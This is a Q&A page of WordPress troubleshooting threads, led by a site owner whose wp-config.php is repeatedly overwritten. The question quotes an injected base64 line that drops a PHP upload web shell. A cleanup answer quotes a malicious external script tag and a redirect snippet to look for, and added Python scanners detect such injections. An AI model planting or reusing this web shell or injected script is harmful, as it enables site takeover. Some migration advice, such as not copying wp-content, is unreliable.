htaccess and wordpress config files are regularly overwritten - php

I have a WordPress site (v5.2.3), and every now and again (possibly monthly) the wp-config.php and .htaccess files are overwritten with bad information.
This results in two problems - first the DB access details in wp-config are changed to something that doesn't work, and then the ability to access my post-link permalinks is lost as a result of information being lost from htaccess.
After being overwritten, my wp-config file is full of lines like this:
file_put_contents("wp-remote-upload.php", base64_decode('PD9waHANCmVjaG8gIlRoaXMgc2hpdCB3b3JrcyEiOw0KaWYgKGlzc2V0KCRfRklMRVNbImZpbGVuYW1lIl0pKQ0Kew0KICAgaWYoJF9GSUxFU1siZmlsZW5hbWUiXVsic2l6ZSJdID4gMTAyNCozKjEwMjQpDQogICB7DQogICAgIGVjaG8gKCJGaWxlIHRvbyBsYXJnZSAobW9yZSB0aGFuIDNNYikiKTsNCiAgICAgZXhpdDsNCiAgIH0NCiAgIGlmKGlzX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZW5hbWUiXVsidG1wX25hbWUiXSkpDQogICB7DQogICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJmaWxlbmFtZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlbmFtZSJdWyJuYW1lIl0pOw0KCSBlY2hvICgiPGJyPkRvbmUhPGJyPiIpOw0KICAgfSBlbHNlIHsNCiAgICAgIGVjaG8oIjxicj5FcnJvciEgIi4kcGhwX2Vycm9ybXNnLiI8YnI+Iik7DQogICB9DQp9DQo/Pg=='));
My wp-config file has so many of these lines that it is about 800Kb in size.
The plugins I am using on my WordPress site are as follows:
Akismet Anti-Spam [v4.0.1 by Automattic]
Contact Form 7 [v4.9.2 by Takayuki Miyoshi]
Duplicator [v1.2.3 by Snap Creek]
Google Analytics for WordPress [v7.7.1 by MonsterInsights]
Hello Dolly [v1.6 by Matt Mullenweg]
Limit Login Attempts [v1.7.1 by Johan Eenfeldt]
Logo Slider [v1.4.7 by EnigmaWeb]
Recent Posts Widget Extended [v0.9.9.7 by Satrya]
Squelch Tabs and Accordions Shortcodes [v0.4.1 by Matt Lowe]
WordPress Importer [v0.6.3 by wordpressdotorg]
Yoast SEO [v5.9.1 by Team Yoast]
Using my FTP program I have tried changing the permissions to the wp-config.php and .htaccess files so they cannot be written to - however my attempts to change these values have resulted in no changes. I am assuming I do not have the ability to change file permissions.
How do I stop these files from being overwritten?
Or how I can discover what is responsible for changing these files?

Looks like your system was compromised / hacked.
Suggest you start by googling what to do in such a case, there’s plenty of resources out there that cover the basics.
Ideally, you should probably delete all core WP and plugin folders, and upload the files again from a “clean” system (to avoid that other files that might have been inserted into your system can still be reached by the attacker from the outside.)
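An added example, not part of the original question or answer: a Python scanner to run over a downloaded copy of the site, which finds every call shaped like the injected `file_put_contents(..., base64_decode(...))` line quoted in the question and reports which file each one would drop. The finding fields and the sample tree built in `demo()` are constructed for illustration.

```python
import base64
import re
import tempfile
from pathlib import Path

# Shape of the injected line quoted in the question:
#   file_put_contents("<name>", base64_decode('<payload>'));
DROPPER = re.compile(
    r"""file_put_contents\(\s*(["'])(?P<target>[^"']+)\1\s*,\s*"""
    r"""base64_decode\(\s*(["'])(?P<b64>[A-Za-z0-9+/=\s]+)\3\s*\)\s*\)"""
)

def scan_file(path):
    """Return one finding per dropper call found in a single PHP file."""
    text = Path(path).read_text(errors="replace")
    findings = []
    for m in DROPPER.finditer(text):
        try:
            decoded = base64.b64decode(m.group("b64"))
        except ValueError:  # malformed base64: still report the call
            decoded = b""
        findings.append({
            "file": str(path),
            "line": text.count("\n", 0, m.start()) + 1,
            "drops": m.group("target"),
            "payload_is_php": decoded.lstrip().startswith(b"<?php"),
            "handles_uploads": b"move_uploaded_file" in decoded,
        })
    return findings

def scan_tree(root):
    """Scan all .php files under root; note whether each dropped file exists."""
    root, results = Path(root), []
    for php in sorted(root.rglob("*.php")):
        for f in scan_file(php):
            f["dropped_file_present"] = any(root.rglob(Path(f["drops"]).name))
            results.append(f)
    return results

def demo():
    """Constructed sample tree: a wp-config.php carrying two injected lines."""
    payload = base64.b64encode(b"<?php // constructed placeholder: move_uploaded_file").decode()
    inject = f'file_put_contents("wp-remote-upload.php", base64_decode(\'{payload}\'));\n'
    with tempfile.TemporaryDirectory() as d:
        Path(d, "wp-config.php").write_text("<?php\n" + inject + "define('DB_NAME', 'x');\n" + inject)
        Path(d, "index.php").write_text("<?php // clean file\n")
        Path(d, "wp-remote-upload.php").write_text("<?php // constructed stand-in\n")
        return scan_tree(d)
```

Call `scan_tree()` on the directory holding the downloaded copy; a finding with `dropped_file_present` set means the dropped file is also on disk and has to go along with the injected lines.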

Related

Too many redirects on wp-login.php and wp-admin 404 not found

I am having issues with my WordPress website. I can't log in at all. When I try to go to wp-admin I get a 404 page not found error and it redirects to wp-login.php (wp-login.php?redirect_to=https%3A%2F%2Fmycrazywebsite.com%2Fwp-admin%2F&reauth=1)
When I go to just wp-login.php I get an error saying redirected you too many times.
I have tried the following:
Clearing my cookies - Did not work
I checked my siteurl and home in wp-options in my database - Both are correct.
Added the following code to wp-config.php:
define('WP_HOME' , 'https://mycrazywebsite.com');
define('WP_SITEURL' , 'https://mycrazywebsite.com');
Removed my .htaccess file
Added the following code to wp-config.php
if (strpos($_SERVER['HTTP_X_FORWARDED_PROTO'], 'https') !== false) $_SERVER['HTTPS']='on';
None of them worked... Please help, I have been struggling with this for days. Would it affect my site if I replace my wp-admin with a fresh one?
PLEASE NOTE:
This website was affected by the temp.lowerbeforwarden.ml virus that is going around.
I would say that it isn't an issue with your Apache configurations since it all started after your site was affected by a virus.
Create a copy of wp-config.php and download it.
Go to wp-includes directory and look for a file called version.php. See the WordPress version that you have.
Visit https://wordpress.org/download/releases/ and download the zip for that version.
Delete everything except wp-content directory.
Upload and extract.
Rename wp-config-sample.php to wp-config.php. Define the DB Credentials and Authentication keys (remember, you saved the old copy of wp-config.php! copy-paste details wherever needed but don't upload the old one unless you are absolutely sure that there's no malicious code in it)
Go to /wp-content/plugins directory and make a note of all the plugins installed. Delete all of them. Get all those plugins from WordPress repositories and upload the zip files and extract them.
Go to your phpMyAdmin and run this query (your table name may vary, it should be wp_posts or maybe in this format wpXX_posts, just check that):
select * from wpXX_posts where post_content like '%script%'
Review the data in post_content for each row and remove any malicious javascript code. (Copy data from that cell, paste in a text editor, review, delete everything from that cell and put back the reviewed data)
Examples (similar things to look for):
<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>
<script type='text/javascript'>window.location.href = "SOME_URL";</script>
Also, look for any Google Analytics or tracking scripts that you didn't add.
Go to wp-content > themes and delete all theme folders. Upload your theme's zip file and extract and put there.
Everything should be working by now. One last step, log in to your WordPress dashboard, go to settings > permalinks and scroll down and click 'save changes'.
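An added example, not part of the original answer: a Python triage pass over rows exported from the `post_content` query above, since `like '%script%'` also matches posts that merely contain the word. It flags `<script>` tags loading from hosts outside an allowlist and inline scripts that set `location`. `ALLOWED_HOSTS`, the finding labels and the sample rows are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_HOSTS = {"mycrazywebsite.com"}  # assumption: hosts you knowingly load scripts from
REDIRECT = re.compile(r"\blocation(\.href)?\s*=|\blocation\.(replace|assign)\s*\(")

class ScriptAudit(HTMLParser):
    """Collect <script> tags that load from unlisted hosts or contain inline code."""
    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed, self.findings, self._inline = allowed_hosts, [], None
    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src is None:
            self._inline = []              # inline script: buffer its body
        else:
            host = urlparse(src).hostname  # None for relative (same-site) URLs
            if host and host not in self.allowed:
                self.findings.append(("external-script", src))
    def handle_data(self, data):
        if self._inline is not None:
            self._inline.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._inline is not None:
            body = "".join(self._inline).strip()
            kind = "inline-redirect" if REDIRECT.search(body) else "inline-script"
            self.findings.append((kind, body))
            self._inline = None

def audit_posts(rows, allowed_hosts=ALLOWED_HOSTS):
    """rows: iterable of (post_id, post_content); returns {post_id: findings}."""
    report = {}
    for post_id, content in rows:
        parser = ScriptAudit(allowed_hosts)
        parser.feed(content)
        parser.close()
        if parser.findings:
            report[post_id] = parser.findings
    return report

# Constructed rows; the script tags in rows 2 and 3 are the ones quoted in the answer.
SAMPLE_ROWS = [
    (1, "<p>How to write a script for a short film</p>"),
    (2, "<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>"),
    (3, "<script type='text/javascript'>window.location.href = \"SOME_URL\";</script>"),
    (4, "<script src='/wp-includes/js/jquery/jquery.js'></script>"),
]
```

`audit_posts(SAMPLE_ROWS)` reports only rows 2 and 3; every inline script is still listed for manual review, including tracking snippets you did not add.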
This error could occur when there is no storage space left on the device where MySQL stores data.
WordPress is unable to save session data in the database and redirects to the login page with &reauth=1.
Try the steps below:
Turn on the debugging log in the wp-config.php file.
Disable plugins one by one by renaming each plugin folder in the /wp-content/plugins/ path and check whether the site works.
Rename the .htaccess and wp-config.php files, upload a new .htaccess and wp-config file from a freshly downloaded WordPress, and update your db name, db user and db password in the wp-config.php file.
Virus-affected websites are mostly injected with some anonymous files, so check for any unknown files in public_folder.
Repair all your database tables in phpmyadmin by this syntax: "repair table "
You can try this
Try debugging by disabling the plugins. It could be a problem caused by a version mismatch.
Replace the old wp-config with a new wp-config.
For the virus attack, just check for any anomalous files. It can only have an effect in the root folder.

Migrating Wordpress to a site with a subdirectory

I've migrated many Wordpress sites before, but now I'm having an issue I just can't seem to solve. Some, but not all of the links are not loading properly.
I'm migrating from local.dev to example.com/test.
In my database options, I have both options set to example.com/test.
I double-checked the options in the WP backend, and they're example.com/test.
I've updated my permalinks.
All of the pages work, all of the links work, but a few references to images, etc do not - they're loading example.com/ instead of example.com/test.
I think it might have to do with the .htaccess file, because I can't update it from the FTP side. If I delete it and update permalinks, no .htaccess file is created. I don't have access to any server side overrides, only the files.
In my MAMP vhosts, I have SymLinks Override set to All, but I can't edit anything like that on the live host.
The links that aren't working are along the lines of $image = get_post_meta(37 ,'_my_meta',TRUE)['img']; which should return
http://www.example.com/test/wp-content/uploads/image.jpg
but instead returns
http://www.example.com/wp-content/uploads/image.jpg.
Using bloginfo('wpurl'); returns http://www.example.com/test, and all similar ones return properly (site_url();, 'template_directory', etc.).
In the end, the site is going to go on http://www.example.com without the subdirectory anyway, but I'm sure I have to get it to work properly to prevent future errors.
I also updated to the newest version of Wordpress at some point, not sure if that could cause any issues.
I believe the issue deals with media and links placed in content items.
I used to do some manual SQL queries to fix this but now I run this plug-in https://wordpress.org/plugins/automatic-domain-changer/
The plug-in will go through all the content and make the needed changes.
The links that aren't working are along the lines of $image => get_post_meta(37 ,'_my_meta',TRUE)['img']; which should return
http://www.example.com/test/wp-content/uploads/image.jpg
This meta information is stored in the DB, so to make the migration you have to change all the old URLs in the DB before importing it in the new place.

Wordpress issue - siteurl and home option is being changed every time I log into the admin

I hope you can help me.
For some unknown reason, every time I log into the admin and update the site, afterwards the "siteurl" and "home" paths are always changed to a previously used "testsubdomain". I already hired a developer who gave up telling me that he isn't a Wordpress specialist and can't see where the issue is.
What I have done until now, I just went into the phpmyadmin every time I noticed that it happened again, and changed the entries back to its correct path manually. This has become a real pain because every time this happens, the contact form entries aren't forwarded to the client either, and he is losing potential business.
Can anyone help and point me into a direction of how to fix this?
The site is http://www.chinatownband.com.
Thank you in advance!
Check to see if the URLs are hardcoded in either wp-config.php or the active theme functions.php file. Those are locations that read the URL settings for WordPress and can be used to fix or hardcode the URLs because they will override the URL settings in the database (see http://codex.wordpress.org/Changing_The_Site_URL ).
You're looking for
define('WP_HOME','http://testsubdomain.com');
define('WP_SITEURL','http://testsubdomain.com');
If you find those, delete them and then change to http://www.chinatownband.com in the database with phpmyadmin as you have been doing.
If those settings are not in wp-config.php or the active theme functions.php file, download the whole theme and use a text editor to search the folder for those define lines.
And look in the root web directory for any non-core WordPress files and folders and check them, too.
In the end, you may also need to use https://github.com/interconnectit/Search-Replace-DB to safely find/replace URLs in the database. The URLs you are changing are only the 2 settings URLs and don't retroactively change any URLs in page/post content that are links to media, other pages, etc.

Transferring wordpress site from one localhost to another localhost

I'm trying to move wp site from localhost on my work computer to my personal computer. I have followed these steps:
Copy wp-content folder
Export database
Import database
Paste wp-content folder
Configure config.php
It copied all the themes and plugins, but content (images, text, pages etc) doesn't display. Did I skip something?
You shouldn't transfer the wp-content folder as a whole, WordPress won't like it and won't find any of the posts/images within it.
If you transfer over just the theme and plugins first so all the files are in place and then do the import of the database you may have more luck.
The only problem will be the images, which may go missing due to the fact that they cannot be downloaded via localhost. Sadly the only way I can think of fixing that is by going through each page and re-adding them.
If the URL was changed:
http://codex.wordpress.org/Moving_WordPress
I would recommend to check wp_config table in the database for the following entries:
option_name='siteurl' or option_name='home'
and check if the values are correct for the new installation.

WP migration, can't login to WP admin

I was in the middle of migrating a local WP site to a live server and came across a problem.
I edited my WP config file and uploaded it along with the rest of the WP files. I also uploaded the mysql database through phpMyAdmin.
Once I tried to test the site I got an error message "The page isn't redirecting properly". I then, mistakenly, logged in to the admin area and in the Settings > General tab I deleted the localhost part of the URL. Now I'm unable to log back in to the WP admin area.
EDIT
To clarify, my major problem is that I can no longer log in to the wp admin area because of something I've done. The steps I took to get to this point were:
Backed up WP using the BackUpWordpress plugin
Edited back up wp-config file with define('WP_HOME','http://example.com'); define('WP_SITEURL','http://example.com');
Created mySQL database through DreamHost
Changed database info in wp-config file
Uploaded wp files (not including mySQL backup) to my url using Filezilla
Imported mySQL database backup to DreamHost
I then checked the site from my browser, an error message said too many redirects occurred
From the wp admin area I went to Settings > General and deleted the localhost part of the url that was displayed.
I believe it's due to the previous step I'm now unable to access the wp admin area at all.
I need a way of getting back into the admin area
You can also edit those options within phpMyAdmin. Go to wp_options and locate siteurl and home. Make sure the URL matches your site URL.
You can also edit the site URL in your wp-config.php.
Add these lines somewhere above the /* That's all, stop editing! Happy blogging. */ line.
define('WP_HOME','http://my-site.com');
define('WP_SITEURL','http://my-site.com');
This should overwrite your database settings.
I believe the problem is that studiomed.co.uk is permanently redirected (301) to www.studiomed.co.uk and www.studiomed.co.uk is permanently redirected (301) to studiomed.co.uk
Login to your Dreamhost account go to Domains->Manage Domains and choose one of the three options there are in "Do you want the www in your URL?".
After that use an ftp program to download the .htaccess file that exists in your root installation of wordpress and open it with your favorite editor. Check if you have any kind of redirection in the .htaccess file.
Which version of WordPress do you use?
Can you list the plugins you are using?
Have you gone through the basic WordPress troubleshooting steps?
flush any caching plugins you might be running, as well as server and/or browser caches.
deactivate all plugins to see if this resolves the problem. If this works, re-activate the plugins one by one until you find the problematic plugin(s). Sometimes, an apparently inactive plugin can still cause problems.
If you can't get into your admin dashboard, try resetting the plugins folder by FTP or PhpMyAdmin (read http://codex.wordpress.org/FAQ_Troubleshooting#How_to_deactivate_all_plugins_when_not_able_to_access_the_administrative_menus.3F if you need help).
switch to the Twenty Eleven theme (depends on your WordPress version) to rule out any theme-specific problems.
If you can't log in to change themes, you can remove the theme folders via FTP so the only one is twentyeleven. That will force your site to use it.
manual upgrade. When all else fails, download a fresh copy of the latest.zip file to your computer, and use that to copy up. You may need to delete the wp-admin and wp-includes folders on your server. Read the Manual Update directions first: http://codex.wordpress.org/Updating_WordPress#Manual_Update
check the Master List to see if you're experiencing a known issue
Login to your wordpress dashboard (wp-admin) and go to Settings->Permalinks, select Default and save changes.
Update all URLs (paths) in the database using these queries, then check:
UPDATE wp_options SET option_value = replace(option_value, 'http://live_ste_path.com', 'http://localhost/local_site_path') WHERE option_name = 'home' OR option_name = 'siteurl';
UPDATE wp_posts SET post_content = replace(post_content, 'http://live_ste_path.com', 'http://localhost/local_site_path');
UPDATE wp_postmeta SET meta_value = replace(meta_value,'http://live_ste_path.com','http://localhost/local_site_path');
[WSOD RESOLVED]
Since I could not find any solution to my problem by googling around, I finally found a crucial piece of tracking info in the WP error logs. So I would recommend inspecting the logs before spending too much time looking for a proper answer on Google.
After migration from an old web host to a new one, in my multisite environment all sites were working. Also, I was able to administer all subsites - but one! Trying the wp-admin login to that site led me to a fatal white screen, without any message or any indication about the reason. And the culprit was a corrupted file, /public_html/subsite-x/wp-admin/admin.php. I really could not understand how that happened; I can only suppose it appeared somehow while transferring files (FTP) from the old host to the new one.
